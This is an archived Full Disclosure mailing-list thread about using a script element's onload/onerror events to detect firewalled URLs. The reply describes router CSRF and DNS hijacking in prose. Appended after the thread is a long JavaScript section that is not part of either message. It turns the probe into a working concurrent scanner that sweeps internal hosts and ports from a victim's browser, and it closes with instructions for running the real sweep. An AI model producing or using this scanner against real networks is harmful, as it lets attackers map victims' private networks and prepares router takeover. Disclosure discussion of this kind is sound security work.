List: full-disclosure
Subject: Re: [FD] Checking existence of firewalled URLs via javascript's script.onload
From: Jonathan Gregson via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2023-04-21 21:19:09
Message-ID: MW4PR22MB34336F7FBD0274BC2618CB37C7609 () MW4PR22MB3433 ! namprd22 ! prod ! outlook ! com
Hi Georgi,
As you suggested, this is a CSRF attack. Using such techniques to attack or enumerate local applications has been known for some time and is a very difficult issue to address. Browsers have done well in preventing malicious _authenticated_ cross-site requests, but as you've found, attackers can still use such techniques for enumeration and information gathering.

Fortunately, it's not very practical except in targeted attacks, either against known victims or known applications that the victim might be running. It takes several thousand or even millions of requests to enumerate an internal network in this way, and the user will likely close your tab before you can discover anything meaningful (the clever ones will use a popunder to increase scan time).

One of the more impactful ways to abuse local applications through CSRF is to attack the router. Many (most?) users leave router credentials and IP addresses set to factory defaults. When victims visit the attacker's website, the website POSTs the default username and password to the router's default IP address, which logs the user into the router. The malicious website then makes a second POST request setting the router's DNS servers to malicious servers, resulting in a DNS hijack. Vulnerable routers can be exploited in the same way, sometimes leading to the attacker taking full control of the router and enlisting it in a botnet.
Just some things to think about.
Thanks,
Jonathan
-----Original Message-----
From: Fulldisclosure <fulldisclosure-bounces@seclists.org> On Behalf Of Georgi Guninski
Sent: Wednesday, April 19, 2023 05:50
To: fulldisclosure@seclists.org
Subject: [FD] Checking existence of firewalled URLs via javascript's script.onload
There is a minor information disclosure vulnerability, similar
to nmap in the browser.
It is possible to check the existence of firewalled URL U via
the following javascript in a browser:
<script src="U"
onload="alert('Exists')"
onerror="alert('Does not exist')"></script>
This might have privacy implications for potentially
"semi-blind CSRF" (XXX does this make sense?).
Works for me in Firefox, Chrome and Chromium 112.
I believe the issue won't be fixed because it will break
stuff in the mess called internet.
For online test:
https://www.guninski.com/onload2.html
--
guninski: https://j.ludost.net/resumegg.pdf
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
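The probe in the original post, generalized into a timed, concurrent sweep, as an added example that is not code from either message in this thread. Beyond the single-URL check Georgi shows, it distinguishes a third outcome (neither onload nor onerror before a deadline, which is what a filtered host that drops packets looks like) and bounds the number of in-flight probes. The host and port lists and the fake-DOM harness are constructed for offline demonstration and are assumptions, not anything from the page; in a real page you would drop the harness and let probeUrl fall back to document.createElement.

```javascript
// Added example (not from the original post or the reply): a timed, concurrent
// generalization of the <script src=U onload/onerror> probe. Hosts, ports and
// the fake DOM harness below are constructed for offline demonstration.

// Probe one URL by loading it as a script. Three outcomes:
//   "exists"  - onload fired: the browser fetched a response and tried to run it
//               (any successful body counts; a JS parse error goes to
//               window.onerror, not to the element's onerror).
//   "missing" - onerror fired: connection refused, HTTP error, or blocked by the browser.
//   "timeout" - neither fired before timeoutMs (typical of hosts that drop packets).
function probeUrl(url, opts = {}) {
  const {
    timeoutMs = 3000,
    createElement = (tag) => document.createElement(tag), // browser default
    attach = (el) => document.head.appendChild(el),       // browser default
  } = opts;
  return new Promise((resolve) => {
    const el = createElement('script');
    let settled = false;
    let timer = null;
    const finish = (result) => {
      if (settled) return; // first event wins; ignore the late one
      settled = true;
      clearTimeout(timer);
      if (typeof el.remove === 'function') el.remove(); // drop the DOM node
      resolve({ url, result });
    };
    timer = setTimeout(() => finish('timeout'), timeoutMs);
    el.onload = () => finish('exists');
    el.onerror = () => finish('missing');
    el.src = url;
    attach(el);
  });
}

// Candidate URLs for a host/port sweep. Which hosts and ports to try is the
// attacker's guess, which is why the reply calls this a targeted technique.
function candidateUrls(hosts, ports, path = '/') {
  const urls = [];
  for (const host of hosts) {
    for (const port of ports) urls.push(`http://${host}:${port}${path}`);
  }
  return urls;
}

// Probe many URLs with at most `concurrency` in flight; returns Map<url, result>.
async function probeUrls(urls, opts = {}, concurrency = 8) {
  const results = new Map();
  let next = 0;
  async function worker() {
    while (next < urls.length) {
      const url = urls[next++];
      const { result } = await probeUrl(url, opts);
      results.set(url, result);
    }
  }
  await Promise.all(Array.from({ length: Math.min(concurrency, urls.length) }, worker));
  return results;
}

// Offline harness (assumption): a fake <script> element whose fate is decided
// by a lookup function instead of a real network. Omit it in a browser.
function fakeDom(decide) {
  return {
    createElement: () => {
      const el = { onload: null, onerror: null, remove() {} };
      Object.defineProperty(el, 'src', {
        set(url) {
          const verdict = decide(url); // 'load' | 'error' | 'hang'
          if (verdict === 'hang') return; // never answers: only the timer can settle it
          setTimeout(() => (verdict === 'load' ? el.onload() : el.onerror()), 0);
        },
      });
      return el;
    },
    attach: () => {},
  };
}

// Constructed internal network (assumption): 10.0.0.1 answers on 8080, silently
// drops 8443, and everything else is refused.
const SAMPLE_HOSTS = ['10.0.0.1', '10.0.0.2'];
const SAMPLE_PORTS = [80, 8080, 8443];
function sampleVerdict(url) {
  if (url.startsWith('http://10.0.0.1:8080/')) return 'load';
  if (url.startsWith('http://10.0.0.1:8443/')) return 'hang';
  return 'error';
}

// Sweep the constructed network and group URLs by outcome.
async function demoScan(timeoutMs = 50) {
  const urls = candidateUrls(SAMPLE_HOSTS, SAMPLE_PORTS);
  const results = await probeUrls(urls, { timeoutMs, ...fakeDom(sampleVerdict) });
  const summary = { exists: [], missing: [], timeout: [] };
  for (const [url, result] of results) summary[result].push(url);
  return summary;
}
```

In a browser, `probeUrls(candidateUrls(hosts, ports), { timeoutMs: 3000 })` with no harness performs the real sweep; the per-URL deadline is what keeps a filtered host from stalling a worker indefinitely, and the bounded concurrency is the knob that trades scan speed against the chance the victim closes the tab first, the practical limit Jonathan points out.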